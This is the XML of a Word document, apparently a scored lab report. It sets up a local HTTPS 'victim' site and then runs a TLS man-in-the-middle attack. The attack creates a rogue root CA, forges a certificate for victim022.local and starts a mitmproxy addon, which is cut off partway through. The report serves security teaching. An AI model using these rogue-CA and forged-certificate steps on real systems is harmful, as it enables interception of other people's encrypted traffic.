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6.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId43.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId20.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId49.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId27.png" ContentType="image/png"/>
  <Override PartName="/word/media/rId2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f33685f83801f1c4749482ba911a8f8ee35f46"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Report+9e8da4ed-3066-4db7-8fb1-1f82f0951d06</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="23" w:name="X396fffe438de0b45ddcc813896a59b2b03f7555"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Part 1: Deploying Victim Website with Self-Signed Certificate</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="21" w:name="step-1.1-create-victim-website-1-pt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.1: Create Victim Website (1 pt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="34579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13033a93-bd67-4a13-b5da-c155f0b8cd6a/506c2b1a5112b1a49a998ab5b5f8ae4af71ac0e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X62a748cbf09cdb9f74453a3a6c8c3693afeaa56"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.2: Generate Self-Signed Certificate (2 pt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">```Plain Text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"># 1. 生成 2048 位 RSA 私钥 victim022.local.key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">openssl genrsa -out victim022.local.key 2048</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="22"/>
    <w:bookmarkEnd w:id="23"/>
    <w:bookmarkEnd w:id="24"/>
    <w:bookmarkStart w:id="25" w:name="生成自签名证书-victim022.local.crt有效期-365-天"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. 生成自签名证书 victim022.local.crt，有效期 365 天</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="25"/>
    <w:bookmarkStart w:id="26" w:name="注意把主题里的-cstlo-按需修改cn-必须是-victim022.local"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">注意把主题里的 C/ST/L/O 按需修改；CN 必须是 victim022.local</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">openssl req -new -x509 -key victim022.local.key -out victim022.local.crt -days 365</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-subj</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/C=CN/ST=SomeState/L=SomeCity/O=SomeOrg/CN=victim022.local</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkStart w:id="34" w:name="设置权限只有文件所有者可读写私钥"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. 设置权限：只有文件所有者可读写私钥</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">chmod 600 victim022.local.key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">###  Step 1.3: Configure Apache for HTTPS (2 pt)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/apache2/sites-available/victim022.local.conf</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">```Plain Text</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;VirtualHost *:443&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ServerName victim022.local</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    DocumentRoot /var/www/victim022.local/html</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # TLS/SSL 配置（改成你在 ~/certs 生成的证书）</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    SSLEngine on</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    SSLCertificateFile /home/openlab/certs/victim022.local.crt</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    SSLCertificateKeyFile /home/openlab/certs/victim022.local.key</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 安全头部</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains; preload"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Header always set X-Content-Type-Options nosniff</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Header always set X-Frame-Options DENY</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # /capture 映射到包含 capture.php 的目录</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Alias /capture /var/www/victim022.local/html/capture.php</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;Location "/capture"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        Require all granted</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/Location&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;Directory "/var/www/victim022.local/html"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        Options Indexes FollowSymLinks</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        AllowOverride None</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">        Require all granted</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;/Directory&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    # 日志配置</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ErrorLog ${APACHE_LOG_DIR}/victim022.local_error.log</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    CustomLog ${APACHE_LOG_DIR}/victim022.local_access.log combined</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/VirtualHost&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve"># HTTP → HTTPS 重定向</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w: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    ServerName victim022.local</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    Redirect permanent / https://victim022.local/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/VirtualHost&gt;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="28" w:name="step-1.4-configure-local-dns-0.5-pt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.4: Configure Local DNS (0.5 pt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="15578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13033a93-bd67-4a13-b5da-c155f0b8cd6a/e6f6398d9108d5cec28e1c8d70259d9b4d113fb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1" w:name="step-1.5-test-victim-website-0.5-pt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 1.5: Test Victim Website (0.5 pt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="1269060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13033a93-bd67-4a13-b5da-c155f0b8cd6a/eddf70e728abfe1860770a796aaa1da1a0bc3e7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9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135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13033a93-bd67-4a13-b5da-c155f0b8cd6a/ee7bcc4f2a5e66bf7245491e4d2d65032234093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3" w:name="part-2-man-in-the-middle-attack"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Part 2: Man-in-the-Middle Attack</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="32" w:name="X6b1f0d74d297ed150896fccd329fae9ccef355a"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2.1: Become a Rogue Certificate Authority (1 pt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">```Plain Text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">mkdir -p ~/rogue-ca</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cd ~/rogue-ca</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="32"/>
    <w:bookmarkEnd w:id="33"/>
    <w:bookmarkEnd w:id="34"/>
    <w:bookmarkStart w:id="35" w:name="生成-4096-位-ca-私钥-rogue-ca.key"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1. 生成 4096 位 CA 私钥 rogue-ca.key</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">openssl genrsa -out rogue-ca.key 4096</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:bookmarkStart w:id="36" w:name="Xf2438cd0ad75191896cb98a6d45ca7d25a01e9c"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. 生成自签名根 CA 证书 rogue-ca.crt（示例：O=Evil Corp, CN=Evil Root CA）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">openssl req -new -x509 -key rogue-ca.key -out rogue-ca.crt -days 3650</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-subj</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">/C=XX/ST=BadState/L=BadCity/O=Evil Corp/OU=Evil CA Department/CN=Evil Root CA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="36"/>
    <w:bookmarkStart w:id="37" w:name="为-ca-操作创建必要的目录和文件"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. 为 CA 操作创建必要的目录和文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">mkdir -p certs newcerts private crl</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="37"/>
    <w:bookmarkStart w:id="38" w:name="index.txt-用于记录已签发证书"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">index.txt 用于记录已签发证书</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">touch index.txt</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="serial-存储证书序列号起始值"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">serial 存储证书序列号起始值</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">echo 1000 &gt; serial</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="52" w:name="验证-ca-证书"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. 验证 CA 证书</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">openssl x509 -in rogue-ca.crt -text -noout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">###  Step 2.2: Install Rogue CA as Trusted (1 pt)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">![](/tmp/13033a93-bd67-4a13-b5da-c155f0b8cd6a/media/Report+9e8da4ed-3066-4db7-8fb1-1f82f0951d06/image 3.png)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">###  Step 2.3: Generate Forged Certificate for Victim (2 pt)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">### 1. First, generate a new private key for the forged certificate</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">```Shell</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl genrsa -out forged-victim022.local.key 2048</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="40" w:name="create-a-csr-with-the-victims-domain"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2. Create a CSR with the victim’s domain</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl req -new \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -key forged-victim022.local.key \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -out forged-victim022.local.csr \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -subj "/C=XX/ST=BadState/L=BadCity/O=Evil Corp/OU=Evil MITM/CN=victim022.local"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="create-an-extensions-file-extensions.cnf"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3. Create an extensions file (extensions.cnf)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">cat &gt; forged-victim022.local.ext &lt;&lt; 'EOF'</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">subjectAltName = @alt_names</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">[alt_names]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">DNS.1 = victim022.local</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">EOF</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="sign-the-csr-with-your-rogue-ca"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">4. Sign the CSR with your rogue CA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl x509 -req \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -in forged-victim022.local.csr \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -CA rogue-ca.crt \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -CAkey rogue-ca.key \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -CAcreateserial \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -out forged-victim022.local.crt \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -days 365 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -sha256 \</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">  -extfile forged-victim022.local.ext</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="44" w:name="verify-the-certificate"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">5. Verify the certificate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">openssl verify -CAfile rogue-ca.crt forged-victim022.local.crt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="28489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13033a93-bd67-4a13-b5da-c155f0b8cd6a/3ef4567046751a7d7fbd15df950e3692c253a37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step-2.4-configure-mitmproxy-2-pt"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step 2.4: Configure mitmproxy (2 pt)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">```Plain Text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">from mitmproxy import http, ctx, tls</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">import re</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">class CertificateForger:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">init</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(self):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"># 这里使用 mitmproxyuser 能访问的路径</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">self.forged_cert = {</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">victim022.local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certfile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/home/mitmproxyuser/rogue-ca/forged-victim022.local.crt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keyfile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/home/mitmproxyuser/rogue-ca/forged-victim022.local.key</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,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ctx.log.info(</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">CertificateForger addon initialized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def tls_clienthello(self, data: tls.ClientHelloData):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mitmproxy v10+:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    - 事件: tls_clienthello</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    - 参数: tls.ClientHelloData</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    通过设置 data.context.cert 指定“对客户端使用的证书”。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sni = data.client_hello.sni</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">    ctx.log.info(f"tls_clienthello: SNI={sni!r}")</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
